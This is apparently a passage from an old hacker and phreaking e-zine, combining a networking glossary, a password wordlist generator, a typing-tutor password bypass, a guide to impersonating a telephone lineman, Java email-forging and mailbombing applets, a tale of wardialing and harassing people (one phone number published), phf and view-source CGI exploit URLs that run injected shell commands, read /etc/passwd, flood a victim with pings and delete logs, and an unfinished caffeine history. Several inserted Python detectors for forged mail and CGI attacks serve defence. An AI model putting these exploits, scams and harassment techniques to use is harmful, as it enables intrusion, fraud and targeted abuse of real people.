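    0x04, 0x00, 0x00, 0x8b, 0x00, 0x00, 0x00, 0x01,
    0x00, 0x00, 0x00, 0x01, 0x50, 0x38, 0x20, 0x00,
    0x00, 0x00, 0x00, 0x03,
    /* payload */
    'B', 'y', 'e'
};

int main(void)
{
    uint8_t plain[sizeof(SAMPLE_OOB)];

    memcpy(plain, SAMPLE_OOB, sizeof(plain));
    plain[33] = 0x18;                          /* same segment without URG */

    printf("URG to 139     : %d\n", is_oob_to_netbios(SAMPLE_OOB, sizeof(SAMPLE_OOB)));
    printf("PSH|ACK to 139 : %d\n", is_oob_to_netbios(plain, sizeof(plain)));
    printf("truncated      : %d\n", is_oob_to_netbios(SAMPLE_OOB, 30));
    return 0;
}
```

Blocking port 139 at the network border is the usual stopgap next to the vendor patches the article mentions.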


_____________________________________________________________

--=[ REality's Digital Dictionary ]=--
Written by REality
REF. Racal-DataCOM (elseberry@usa.net)



(Block)
A quantity of information transmitted as a discrete entity by its own starting and ending points, usually with its own control, routing, and error
correcting information.

(BMS) (Bandwidth Management Service)
An option available with Accunet T1.5 service from my friend and yours AT&T to enable customers to use an on-premises terminal to reconfigure channels within their T1 trunkz in as little as one minute preventing the hassle of waiting on tech for 25 fucking years.

(BOC) (Bell Operating Company)
Any of the 22 local telephone companies divested from AT&T and reorganized into the seven regional Bell Holding Companies. Examples include Bellsouth, Bell Atlantic, Southwestern Bell, blah.

(BPS) (Bits per second)
A measure of speed in serial transmission. Also used to describe hardware capabilities. Examples of this shit include a USR 56KBps modem.

(Bridge)
A device that connects two LANs. Bridges function at the data link layer of the OSI model, and provide protocol-independent forwarding data between two totally fucking different networks.

(Broadcast)
The delivery of a transmission for two or more stations at the same time, such as over a bus-type local area network or for rich fuckers, by satellite.

(Brouter) (WooHoo!)
A device that combines the functions of a bridge and a router. Can route one or more protocols, such as TCP/IP and XNS, and bridge all other traffic over to the local network. In other words, a brouter is tha' shit.

(Bypass)
Any private networking scheme that accesses long-distance transmission facilities without going through the local exchange carrier.

(Byte)
A computer-readable group of bits (normally 8 bits in length).

(Byte Stuffing)
The insertion of specific bytes of information into a stream of data to act as control characters for that certain stream of data.


_____________________________________________________________
[ Generate.pas ] by Scud-O

{$N+,E+}
PROGRAM Generate;
(*************************************************)
(* Generate 1 - A program to be used to generate *)
(* wordlists for password cracking. Uses *)
(* factorials and permutations to generate it *)
(* *)
(* See below on how to enlarge the list, etc. *)
(*************************************************)

TYPE
PermString = String[13];

FUNCTION Factorial(B : Byte) : Extended;
VAR
T : Extended;
N : Byte;

BEGIN
T := 1;
FOR N := 1 TO B DO T := T*N;
Factorial := T;
END;

PROCEDURE Xchg( VAR A, B : Char);
VAR T : Char;
BEGIN
T := A;
A := B;
B := T;
END;

FUNCTION PermOf(Org : Permstring; L : LongInt) : PermString;
VAR
P, Q : Byte;
Nump : LongInt;

BEGIN
PermOf := '';
IF L < 1 THEN Exit;
Nump := Round(Factorial(Length(Org)));
IF L > Nump THEN Exit;
Dec(L);
P := 0;
FOR Q :=Length(Org) DOWNTO 2 DO
BEGIN
Inc(P);
Nump := Nump DIV Q;
Xchg(Org[P] , Org[P + (L DIV Nump)]);
L := L MOD Nump;
END;
PermOf := Org;
END;


VAR
N : LongInt;
Wordfile : Text;

BEGIN
Assign( Wordfile, 'wordfile');
Append(Wordfile);

(******************************************************************
* Ok, to make this bigger and have a larger word file, first,
* enlarge the number in the Round(Factorial(X)) and then where
* PermOf('letters') replace that with the letters you want to use
* I used append() so that you can keep building the list. have fun
*******************************************************************)

FOR N := 1 TO Round(Factorial(7)) DO
WriteLn(Wordfile, PermOf('abcdefg', N):5);
Close(Wordfile);

END.


_____________________________________________________________
The Weather Report: Back Door to MicroType
By: WeatherMan


MicroType is a little typing tutor designed for
teaching in the classroom. I think it's real pathetic
because they make it so you can't do certain things you
want it to do. This may help you in your journeys.
First go to the \mt directory. Second find a file
called m.xxx xxx=bat or exe I don't really remember.
Third run it and it should give you a password prompt.
Fourth put in "010" and it will ask you if you want to
change the password or not. Voila, amaze your friends
and give me credit.

Contact Info:
weatherm@surfsouth.com
www.surfsouth.com/~weatherm
UIN Number: 1209195


_____________________________________________________________
[ Linemen Scams ] by phear.



Well fuck, here we go. Special thanks to whoever feels like
publishing this. After all without information we are all truly lost.
Ever been out beige boxing and thought to yourself, "self, this rules
but there has to be more".. almost as if something was missing? Well
i'll tell ya, it's not an overwhelming urge to accept the lord as your
saviour. (so maybe i'm a little bitter) I was out just doing the usual
beigeboxing the other night and I thought to myself, "Why should I be
forced to do this in the dark at night in fear of being caught?" And that's
when i realized i don't have to, in fact neither do you.

What better scam than to pretend you're a lineman. Hopefully if
you're beigeboxing you know enough about phones to be a lineman, if
not you could wing it if you had to. So here's what you do. Go buy
a white hardhat. Any white hardhat will do, just as long as it fits
right, I mean why be uncomfortable in the midst of phreaking? Then
rummage through your closet ( I know, I know, I wouldn't want to go
in there either ) until you find a longsleeve light blue shirt. Grab
a pair of jeans too. Alright now, put it all on and look in the mirror.
Believe it or not you will look a whole hell of a lot like a lineman. Or
at least enough for the general public to be fooled. Now what you're missing
are tools. No lineman's outfit is complete without tools.

A utility belt isn't a bad idea but not a necessity, I've never
used one. You need a red phone, baseless of course. Preferably a lineman's
handset, but those aren't always just readily available. If you want one
bad enough though just swipe one out of a Bell truck. The important thing
is that whatever phone you have, it's red. Remember we're fooling the general
public here. You also have got to have a 7/16" hex driver, preferably with
a red handle but beggars can't be choosers. Hell when you swipe the phone
just swipe the hex driver too. In fact if you can, take the whole tool belt.
You also need a small flashlight, poor lighting or something, you never
know. Alright, you've got the outfit, tools, and a need to phreak.

Where to phreak at though? I mean you don't have a big white truck
with all sorts of compartments in it to make you totally legit. So you have
to maintain a low profile. Always pick a spot and then park a block from it
and walk there. Starting off you should hit a few houses. Places where
nobody's home, at work or something. Just walk up there and open up the
phonebox, act like you belong there. I guarantee no one will even question
you for a minute. After you feel pretty confident move on to bigger and
better phreaks. Go hit a local business or two, but go inside and tell them
that you were sent from their phone company, whatever it is and that you are
doing a routine check on the lines because there's been some trouble a few
lines down etcetera.. Then go find the box, if you want, ask them to show
you the phone setup in the building. This is the best way to get confident
about a scam like this. Check it all out, pump them for information. Then
go back to the box and make a few free calls. If you're going to go this far
though you should probably have a lineman's handset. Looks a lot more
professional. Then move on to large apartment complexes. These are
especially nice because the lines are always grouped together. At least
four in each box.

So now you have your method down and you feel pretty confident. What
can you really do with these new amazing lineman's powers? Well you know
that jerk you're always pranking? Now you can go to his house and fuck his
shit up in broad daylight. In fact go to the door and talk to him about his
phone service for a minute or two. Ask him if he's been having trouble with
the lines, so on so forth. Ask him if he minds if you come in for a minute
and have a look at the phone lines in the house. Walk around and pay
attention. You never know what you'll see, potential black mail info, or
maybe a bill with his ss# on it. Then explain to him that due to maintenance
purposes you're going to have to disconnect his line for an hour or so. Then
go out to his phone box and do just that. Then go back up to the house and
tell him that you have an emergency and have to go, but you'll be back in
just a few minutes. Leave. Gee, did I forget to hook your shit back up?
Now the next time you call him you can tell him exactly what he looks like
and what his house looks like. He would probably never suspect the lineman.

This would probably be the point where you're wondering if this is
all just bullshit or not. Well, I'll tell ya. Or not. I have done this and
it works. Just maintain a very cool composure. Never act nervous or let
the "victim" think you are unsure of yourself. Never go out any later than
4:00 or so, and don't stay in any one place for more than 20 minutes. One
more cardinal rule, if you see a real lineman, or a phonetruck, get the fuck
out of there. As much as I hate to think about it, impersonating a lineman
is a crime, and so is phone fraud so don't hang around. The linemen will
know a fake when they see one.

That's it. The lineman's scam can be pulled off by anyone, but don't
ever forget that it is a scam, and should be done cautiously. So if you're
just tired of the same old beigebox routine and need a change of pace, just
say fuck it. Go be a lineman, you'll thank yourself.

phear <PLA> <OCPP> <HBS>

_____________________________________________________________
[ Java Mail Forging, Bombing, and Other Aspects ] by Scud-O


Ok, we all know how easy it is to 'forge' e-mail on the internet.
just telnet in to port 25 and use the sendmail commands like MAIL FROM: ,
RCPT TO: , DATA, QUIT, etc to 'forge' mail from a server.
Of course, this is not really forged mail, since your domain is still
shown in the header for the mail, but since most people these days use either
Netscape mail, or Eudora, which only display the short little header, many
people may think that a mail from thepope@vaticancity.va could be real. Well,
actually if you thought it was real youd have to be real dumb or real drunk.


PopeMail.Java - [ Java Mail Forging ]
---------------

import java.applet.*;
import java.io.*;
import java.net.*;

public class PopeMail extends java.applet.Applet implements Runnable {

public static Socket socker;
public static DataInputStream inner;
public static PrintStream outer;
public static int mailPort = 25 ;
public static String mailFromPope = "vaticalcity.va";
public static String toLammah = "lammah@lameville.net"; // Change this!
public static String starter = new String();
Thread controller = null;

public void init() {

try {
socker = new Socket(getDocumentBase().getHost(), mailPort);
inner = new DataInputStream(socker.getInputStream());
outer = new PrintStream(socker.getOutputStream());
}
catch (IOException ioe) {}
}

public void start() {
if (controller == null) {
controller = new Thread(this);
controller.setPriority(Thread.MAX_PRIORITY);
controller.start();
}
}

public void stop() {
if (controller != null) {
controller.stop();
controller = null;
}
}

public void run() {
try {
starter = inner.readLine();
}
catch (IOException ioe) {}
SendMail("HELO " + mailFromPope);
SendMail("MAIL FROM: " + "thePope@" + mailFromPope);
SendMail("RCPT TO: " + toLammah);
SendMail("DATA");
SendMail("Subject: Your Sainthood" + "\n" +"Greeting O Holy one," +
"\n" + "\n" +
"I have decided to claim you Saint Lammah for your dedication\n" +
"at being lame. Thank you for your hard work. Countless\n" +
"generations will smile upon your holy name for your hard\n" +
"work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" +
"\n" +
"The Pope, John Paul II\n" +
"thepope@vaticancity.va \n" + "\n");
SendMail("QUIT");
try {
socker.close();
}
catch (IOException ioe) {}
}

public void SendMail(String toSend) {
String response = new String();
try {
outer.println(toSend);
outer.flush();
response = inner.readLine();
}
catch(IOException e) {}
}
}

The applet is very simple in its conception and operation. The init()
method creates a socket to communicate with port 25 on the applet's home host,
a DataInputStream to read lines of text from the socket, and a PrintStream to
write lines of text to the socket. Once the applet starts, it uses its
SendMail() method to interact with sendmail. SendMail() sends a string to
sendmail and reads its response. The run() method of PopeMail
then follows the command format given in /etc/mail/sendmail.hf to send its
e-mail letter.


It is important to understand clearly what happens here. By viewing
the applet, you are forced to connect to port 25 on the applet's home
host, and you have no choice in the matter. You need not even be made
aware that this is happening. The applet controls everything about your
interaction with sendmail: the recipient, the message, and even the return
address supplied to sendmail. Nevertheless, the e-mail header identifies you
(or at least your machine) as the originator of the message. Of course on a
soundly administered system, careful logging will reveal the applet as the
instigator, so the threat may not be as serious as it seems at first.
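
An added example, not part of the original article and not Scud-O's code: the
point made above, that the receiving server's own header still records where the
connection really came from, checked in Python. It assumes a sendmail-style
Received line of the form "from HELO-name (reverse-dns [ip])"; both messages
and every host name in them are constructed samples.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the client says "HELO vaticancity.va" but the relay
# records the host and address the TCP connection really came from.
FORGED = (
    "Received: from vaticancity.va (ppp42.dialup.example.net [192.0.2.42])\n"
    "\tby mail.example.org (8.8.5/8.8.5) with SMTP id KAA01234\n"
    "\tfor <user@example.org>; Sun, 1 Jun 1997 10:01:00 -0400\n"
    "From: thePope@vaticancity.va\n"
    "To: user@example.org\n"
    "Subject: Your Sainthood\n"
    "\n"
    "Greeting O Holy one,\n"
)

# Constructed sample: an ordinary message whose names all agree.
PLAIN = (
    "Received: from mail.example.net (mail.example.net [198.51.100.7])\n"
    "\tby mail.example.org (8.8.5/8.8.5) with SMTP id KAA01299\n"
    "\tfor <user@example.org>; Sun, 1 Jun 1997 10:07:00 -0400\n"
    "From: alice@example.net\n"
    "To: user@example.org\n"
    "Subject: lunch\n"
    "\n"
    "noon?\n"
)

# Assumed sendmail-style layout: from <HELO name> (<reverse DNS> [<IP>])
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+"
    r"\((?:(?P<rdns>[^\s\[\]()]+)\s+)?\[(?P<ip>[0-9A-Fa-f.:]+)\]\)"
)


def site(host):
    """Comparison key: last two DNS labels (assumption: no public-suffix list)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def inspect_origin(raw):
    """Compare what the sender claimed with what the receiving relay recorded."""
    msg = message_from_string(raw)
    received = msg.get_all("Received") or []
    if not received:
        return None
    # Only the top Received header was written by our own server; any
    # further down arrived with the message and can be invented.
    m = RECEIVED_RE.search(received[0])
    if m is None:
        return None
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    helo, rdns, ip = m.group("helo"), m.group("rdns"), m.group("ip")
    findings = []
    if rdns is None:
        findings.append("no-reverse-dns")
    elif site(helo) != site(rdns):
        findings.append("helo-mismatch")
    if from_domain and site(from_domain) != site(rdns or helo):
        findings.append("from-mismatch")
    return {"helo": helo, "rdns": rdns, "ip": ip,
            "from_domain": from_domain, "findings": findings}


if __name__ == "__main__":
    for name, raw in (("forged", FORGED), ("plain", PLAIN)):
        print(name, inspect_origin(raw))
```

A From/relay mismatch also shows up on legitimate mail (forwarders, hosted
domains), so the findings point you at the recorded IP; they are not proof.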




PopeMailBomb.Java - [ Java Mail Bombing ]
---------------

import java.applet.*;
import java.io.*;
import java.net.*;

public class PopeMail extends java.applet.Applet implements Runnable {

public static Socket socker;
public static DataInputStream inner;
public static PrintStream outer;
public static int mailPort = 25 ;
public static String mailFromPope = "vaticalcity.va";
public static String toLammah = "lammah@lameville.net"; // Change this!
public static String starter = new String();
int i;
Thread controller = null;

public void init() {

try {
socker = new Socket(getDocumentBase().getHost(), mailPort);
inner = new DataInputStream(socker.getInputStream());
outer = new PrintStream(socker.getOutputStream());
}
catch (IOException ioe) {}
}

public void start() {
if (controller == null) {
controller = new Thread(this);
controller.setPriority(Thread.MAX_PRIORITY);
controller.start();
}
}

public void stop() {
if (controller != null) {
controller.stop();
controller = null;
}
}

public void run() {
try {
starter = inner.readLine();
}
catch (IOException ioe) {}
for(1=0; 1 < 500; i++) { // this is just a sample value, use whatever

SendMail("HELO " + mailFromPope);
SendMail("MAIL FROM: " + "thePope@" + mailFromPope);
SendMail("RCPT TO: " + toLammah);
SendMail("DATA");
SendMail("Subject: Your Sainthood" + "\n" +"Greeting O Holy one," +
"\n" + "\n" +
"I have decided to claim you Saint Lammah for your dedication\n" +
"at being lame. Thank you for your hard work. Countless\n" +
"generations will smile upon your holy name for your hard\n" +
"work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" +
"\n\n\nBy the way, this is a mail bomb!\n" +
"\n" +
"The Pope, John Paul II\n" +
"thepope@vaticancity.va \n" + "\n");
SendMail("QUIT");
}
try {
socker.close();
}
catch (IOException ioe) {}
}

public void SendMail(String toSend) {
String response = new String();
try {
outer.println(toSend);
outer.flush();
response = inner.readLine();
}
catch(IOException e) {}
}
}

Ok, so this code is pretty much the same, but it adds a for loop for
bombing people. I added in a sample value of 500, but use what you like. The
one pain with this program is that you must edit and compile/run this file
each time you wish to bomb a person. Part of this is because we have more than
enough mail bombing already. But if you want to make this code more versatile,
just add some forms to it for the web applet, or add the code to enter in
different values for toLammah, mailFromPope, and even a file to use for the
message. It's your code now, do whatever you fuckin feel like. I don't care.

_____________________________________________________________
[How To Turn Your Car Into A Mobile Phreaking Unit] by phear


Well all right then.. I'd like to start off with a special thanks to
Havoc Bell and OCPP for putting this in their zine and for having a good zine
in general (they're getting less and less common.) I'm sure every true phreak
out there has been wardialing from home lookin' for a couple pbx's or a fax
or two to plague and thought to themselves, damn it sure would be a lot
better if I didn't have to do this from home... what with all the *69's and
so on.. well I've thought this myself and I decided I was gonna do somethin'
about it. That's why I'm writing this article.. how to turn your vehicle..
even the most piece of shit car you've ever had.. you know, the one you
always had to pushroll to start, the one that didn't have reverse or an
e-brake, into a mobile phreaking unit. What if you didn't have to wardial
from home, what if you simply had to pull your car up and whip out a 50ft.
phone cable and jack in wherever you pleased.


You can.. if you are reading this then you have a pc, or are reading it
on a friends pc and I'm sure through your incredibly persuasive powers of
coercion you could convince them to try this idea out, in fact just bribe
them, you'll thank yourself, offer them your sister, free #900 calls, revenge
etc. Anyway, here's what you need.. A pc with a modem.. any pc will do, if
you have to go steal your grandpa's XT and stick a 2400bd in it. A monitor,
VGA is nice but not a necessity, the smaller the better. A power source.

Now the power source issue is a little more complex, right now cuz
I'm short on cash I use an APC Powecell backup for electric in the car. I
bought it for my pc a while back cuz UE sucks. Anyway its good for about 4
hours and that's plenty. Any kind of backup will do, as long as you get at
least an hour out of it, you'll have to find the internal speaker cuz when
that sucker starts doing backup power its gonna make a real annoying beep,
so take it apart and desolder the internal speaker and then you're set. Of
course the best type of power supply, the one I recommend is a line inverter,
or converter or some shit.

Anyway what it does is take the 12vdc from your car and turn it into
120vac. The best one I've ever used is made by tripplite and its about $100.
I know, I know a little pricey but its worth it, with the car on you will
never notice a decrease in battery power, with the car off you could run a
pc about 3 hours without draining the battery much, the cheaper line
inverters may cause some strange small lines on your monitor, which really
aren't bad just kind of annoying.


All right so you've got all your supplies, now you're asking yourself what
the fuck do I do with all this shit.. You've just got to mount it. I have a
small black Escort Gt. If I can fit all this shit in my car then so can you,
firstly find a good place for the pc itself. Behind the passenger seat works
well, unless you have a van, which is truly the ultimate phreaking machine,
then just slap a desk in the back and grab an extension cord. As for the
cars, in most cars the best place to mount the monitor is in the front
passenger seat wedged in-between the dashboard and the edge of the seat,
sits at a nice angle so you can see what you're doing and it looks real nice..
or at least as nice as a monitor wedged into a car can look. Now if you just
happen to luck out and find a nice small monitor, like a 10" or an 8"
then just stash it somewhere... if you have enough room stick it in-between
the passenger and driver seats. You wanna put the power supply in an easy to
reach place so you can run all the cords to it without a lot of hassle. Then
you need to determine how many people are coming with you on your little
joyride and tell the other three to go the fuck away you only have room for
one and he's riding in the back. Oh yea and if you have an external modem I
would recommend sticking it in the passenger side by the door in that crevice
under the seat. Okay you also need at least 25ft. of your favorite phone
cord.. just take the one off your girlfriend's phone.. So, you've got your
vehicle all loaded up and you're ready to go.. but you're not sure exactly how
best to use this new found toy. So I'll tell you about a few of the things
I've done with mine.


Well the first and foremost thing to do is go find a good spot, if you're
gonna use a good size box with a lot of connections then make sure to bring
your beige box, and if you plan on harassing any of these fools grab your
favorite touch-tone too. So me and chaos and his girlfriend (don't ask me
why I let her go, I didn't have the room and she bitched about her leg
cramping the whole time) were out looking for a good spot and found a nice
dark church, which by the way are really good spots to go most of the time.
We parked the car on the side opened up the phonebox and just plugged right
on in.. I had the girlfriend do lookout duty and then dialed 72# 573-xxx-xxxx
and forwarded everything to my favorite person to harass... which by the way
if anyone wants to call her is 573-581-7077.. and make sure you say something
about her mom... anyway .. and since I live in a little shit town people here
are very guarded about phone harassment so they respond well to hang-ups. So
I loaded up my favorite wardialer, ToneLoc, which is a great wardialer, but
I also use THC-Scan from time to time.. I set the call time to 15 sec. to
allow for a good two rings and set it to dialing, I called about 80 numbers
at random with the wardialer.


Now this is one of my favorite tricks.. all the people that *69 call
the forwarded number and never interrupt my dialing...so I figured I'd had my
fun there and decided to get the hell out of there.. sides, the girlfriend
had to use the bathroom, and for some reason the bushes just weren't good
enough ( I can't imagine why ) so off we went, to the gas station, where I
happened to notice the fax number, wrote it down when I got to the car, and
went to another local church, unfortunately it had floodlights.. so I hopped
out and unscrewed the bulbs, jacked in and faxed several nasty letters to
the gas station about how much I really hate the way they look at me when I walk
in there, just because I have a nosering and don't like my pants to fit so
tight I have to talk in a high pitched voice is no reason to i.d. me every
time I want a pack of smokes. So chaos thought it might not be a bad idea
to give them a call and make sure they got the faxes.


So he called and told the tubby bitch behind the counter to fuck off and
enjoy the faxes.. well all right. That's it.. and remember if you see a cop
just pretend you're lost, most cops are completely pc illiterate and have no
clue about phreaking either, so if you can't run then just play dumb. "Oh no
officer that's not a pc in my car, it's part of a new computerized throttle
control"... or maybe you could try "Well if you weren't so busy eating that
doughnut maybe you'd know that this is a highly sophisticated state of the
art mobile phreaking unit used to create chaos in the homes of people just
like you, and I never would have known about it if it hadn't been for Havoc
Bell and OCPP and this really fucked up article I read written by some guy
named phear who phreaks with chaos and crypto and somebody else's girlfriend,
who can't seem to use the bathroom in the bushes." well that's all.. happy
mobile phreaking.

phear. <PLA> <HBS> <OCPP> tyreiron@mail.geocities.com


_____________________________________________________________

*** Securities Hole in cgi-bin
*** memor@mygale.org - http://www.mygale.org/00/memor

*** 1 - The really known phf script:

Mostly the URL victim is really unsecure and the system admin
doesn't know about cgi-bin security lack.
And mostly the hackers do that hole in that way :
http://www.victim.com/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
but well, lots of phf are patched and more and more servers
are now protected and well .. system admins "sometimes" know
shadowing their passwd file and having login:x: on Query Result
is not really fear for those hackers.
By the ways.. Http commands (GET mostly) are logged in the
/www/logs/ directory.. so when u try some hack with phf
on the navy or some secret services.. hm.. u should use a gateway
before..
Well.. There are other uses for that script.. personally,
i dont use it for reading the server passwd file due to the
reasons i explained before..
You must remember that %0a escape to command shell (lf) and
that %20 is the space.
for example.. im on Efnet IRC and some aol lamer is annoying me
... i use a lame weapon for killing him.. a really lame one :
icmp via phf..

/whois AoLaMer
*** AoLaMer is ppp125.lamer.aol.com
*** AoLaMer is on #Aoltalk
*** AoLaMer is using irc.primenet.com
*** AoLaMer is away: Lamer
*** Notice that i used some lame mirc winblows interface.

[10:01] <AoLaMer> You suck dude, im 3|1+3 cause i use AoL!
[10:02] <memor> ok man

i use my favorite netscrupe brownser now and i enter that url:
http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20
-s%205000%20ppp125.lamer.aol.com

well that command will be translated for the server by
(translate %20 in space) a
ping -c 1000 -s 5000 ppp125.lamer.aol.com

the victim server will hit that dude modem with 1000 packets
of 5008 bytes.. if he is really lame.. abort the current
Contacting Server (the netscrupe wont stop to "Contacting Server"
since the icmp is not completely done) .. so abort it.. The icmp
will continue during that time.. and do another Query.. so
another 1000 packets of 5008 bytes.. when i tried to icmp with
ping echos > 6008 bytes, the server returned -1.. well : an error.

There are other uses.. commands in /bin that www can access
and u can mkdir write in the www dirs..

like (...)%20cp%20phf%20.fhp will copy phf to .fhp so the kewl
root wont see it with a normal ls (-l) but.. hmm beware if he
uses ls -a .. so u'll be able to call it by a
http://www.victim.lame.com/cgi-bin/.fhp after..

*** 2 - Wrap Script:

Well i'll be quick on Wrap script ... its a boggus script
found in irix 6.2 features i know and the use is
http://www.victim.com/cgi-bin/wrap?../../../etc/passwd
i know that script allow only a file view.. and well on irix..
and.. passwd files are sometimes shadowed.
well i didnt try http://www.victim.com/cgi-bin/wrap?%0als(...)
so.. i dont know if that script is so boggus.. i should also
try some buffer overflow.. but same here.. i dont know if it
works.

*** 3 - View-Source Script:

I was really proud to find that script.. i found it in
the florida institute of technology server..
http://www.fit.edu after they had patched their phf by
"rm-ing" it and after having "rm-ed" my fhp and my .fhp
and my another .YouSuck ones.. They know the use of ls -a ,
Wonderful!! but well.. here view-source was not really
useful.. view-source is a "wrap" for Netscape Communicator 2.0
features. (do a http://www.future.victim.com/cgi-bin/test-cgi)
and well.. like wrap.. its the same way to access the passwd
file..
http://www.new.victim.com/cgi-bin/view-source?../../../etc/passwd
.. on www.fit.edu their passwd file is shadowed btw.
i tried some
http://www.old.victim.com/cgi-bin/view-source?%1b or %0a ..
others %20.. but.. no work..
the only strange thing i saw was on a %0a .. some strange Query
Results were appearing..
I tried a buffer overflow of view-source but it doesnt work.

*** 4 - php.cgi Script:

Well i never used php.cgi script but i know that its normally
like a wrap or a view-source... so the use is
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
well same here.. i did hear it had a way to escape to
command shell.. but i dont know about it. personally
i use others ways (not httpd ones) for hacking servers.

*** 5 - Some uses i did with phf.

http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot

http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.victim.com/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.victim.com/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.victim.com/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

*** 6 - But remember:

The httpd access are logged in the logs dirs of the www directory.
so.. hmm dont try to hack some "High Security" server with that..
well for me i hacked one time a "hot" server.. National
Supercomputing Center for Energy and Environnement (www.nscee.edu)
.. the next day.. all was patched and all the passwd file i got
and decrypted was.. disabled .. :*:
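
An added example, not from the original article: section 6 says these requests
end up in the httpd access log, so this Python scan flags the request shapes
shown in sections 1 to 5 (a decoded %0a in the query string, ../ traversal, and
dot-named copies left in cgi-bin). The log lines are constructed, the addresses
are documentation values, and Common Log Format is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote

# CGI programs named in the article.
WATCHED = {"phf", "wrap", "view-source", "php.cgi"}

# Common Log Format (assumed layout of the server's access_log).
CLF_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/1997:10:02:11 -0400] "GET /index.html HTTP/1.0" 200 2048
198.51.100.23 - - [01/Jun/1997:10:03:40 -0400] "GET /cgi-bin/phf?Qname=a%0acat%20/etc/passwd HTTP/1.0" 200 512
198.51.100.23 - - [01/Jun/1997:10:04:02 -0400] "GET /cgi-bin/wrap?../../../etc/passwd HTTP/1.0" 404 210
198.51.100.23 - - [01/Jun/1997:10:05:17 -0400] "GET /cgi-bin/.fhp?Qname=a%0Als%20-al%20/dir/to/go HTTP/1.0" 200 930
192.0.2.10 - - [01/Jun/1997:10:06:00 -0400] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 310
this line is not in Common Log Format
"""


def classify(target):
    """Return (script, tags) for one request target; tags is empty if benign."""
    path, _, query = target.partition("?")
    if "/cgi-bin/" not in path:
        return None, []
    script = path.rsplit("/", 1)[-1]
    decoded = unquote(query)  # handles %0a and %0A alike
    tags = []
    if script.startswith("."):
        tags.append("hidden-cgi")         # e.g. a copy of phf saved as .fhp
    if "\n" in decoded or "\r" in decoded:
        tags.append("newline-injection")  # %0a starts a second shell command
    if "../" in decoded:
        tags.append("path-traversal")     # wrap?../../../etc/passwd style
    return script, tags


def scan(log_text):
    """Return (findings, unparsed_line_count) for a block of access-log text."""
    findings, unparsed = [], 0
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if m is None:
            unparsed += 1
            continue
        script, tags = classify(m.group("target"))
        if not tags:
            continue
        findings.append({
            "host": m.group("host"),
            "when": m.group("when"),
            "script": script,
            "known_script": script in WATCHED,
            "tags": tags,
            # A 2xx status means the program exists and ran: treat it as
            # an incident to investigate, not just a probe.
            "executed": m.group("status").startswith("2"),
        })
    return findings, unparsed


def by_host(findings):
    """Count flagged requests per client address."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    hits, skipped = scan(SAMPLE_LOG)
    for h in hits:
        print(h["when"], h["host"], h["script"], h["tags"],
              "EXECUTED" if h["executed"] else "probe")
    print("unparsed lines:", skipped, "per host:", dict(by_host(hits)))
```

The list in section 5 ends with an rm of ../logs/access_log through the same
hole, so run a check like this on a copy of the log kept off the web server.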


_____________________________________________________________

The History of Caffeine by Scud-O

NOTE: This was for my chemistry project, which i did publish online. However,
im not giving out the url, since well it kinda reveals who i am, so if you
REALLY want to see the project and all the cool pictures, e-mail me.

Prehistory ( 600,000 - 700,000 years ago )
Most known caffeine-yielding plants were probably discovered
and used during the paleolithic, or Stone Age, times, which
were approximately 600,000 to 700,000 years ago. The Stone
Age people probably chewed the seeds, bark, and leaves of
many different plants, and they most likely associated the
chewing of certain plants ( the caffeine-yielding ones )
with the resulting changes in mood and behavior.


Eventually, caffeine was cultivated and consumed to banish
fatigue, prolong awakeness, elevate mood, and promote
concentration.


The Stone Age people may have learned to grind the
caffeinated plant material into a paste and used it to aid
in digestion. Much later it was discovered that by adding
the plant into hot and boiling water that a liquid could be
created that when ingested produced even greater effects.
( How else do you think someone would learn to boil something
dark and bitter like a coffee bean? ) The boiled drink
produced greater effects since more caffeine is extracted
from a plant substance at higher temperatures. This discovery
led to the origin of all caffeine containing beverages,
including coffee, tea, soda, cocoa, kola tea, yoco infusion,
cassina, mate, and guarana.




Tea & Its History
Tea has always been used both as a hot beverage and as
a medicine. Records have indicated that tea drinking may
date back to as far as 4,700 years ago. Tea use ( as well
as many other aspects of Chinese culture ) spread to Japan
around 600 A.D., but it took another 700 years for it to
fully integrate into the Japanese life. During the 17th
century ( 1600 AD ), just as the use of coffee was being
introduced into Europe from Turkey, Dutch traders began
to bring tea into Europe. Despite its initial high cost,
it quickly spread throughout Europe, and soon became the
beverage of choice ( displacing coffee ) in many areas of
Europe.


Tea took a particularly strong hold in North American
colonies. A tourist visiting the colonies during the
1760s once wrote that American women were "such slaves
to it ( tea ) , that they would rather go without their
dinners than without a dish of tea".


Partly to reaffirm its status as a strong colonial ruler,
( and to collect more revenue ) , in 1767 the British
government put a special tax on tea and several other items.
As a result, the colonists boycotted tea and began using
substitutes and alternatives, such as coffee. They also
partook in events like the Boston Tea Party, and either
tossed tea overboard or blew up ships trading tea, or just
plainly denied them the ability to dock. To keep the
revolution up, local doctors and clergy attributed an assortment of
ills and evils to tea drinking.


During this time, most of the world's tea came from China,
( and most of it still does ) . Through the East India
Company, the British had almost a total monopoly on the
tea trade. In 1833, when the company's commercial treaty with
China had expired, British control of the tea trade became
weaker and weaker. After 1833, the British tried cultivating
tea in the Indian subcontinent. However, China tea did not
grow well in India, and the tea plantations of India were only
successful when the local Assam variety of tea was cultivated.
As recently as the 1870s , more than 90% of British tea was
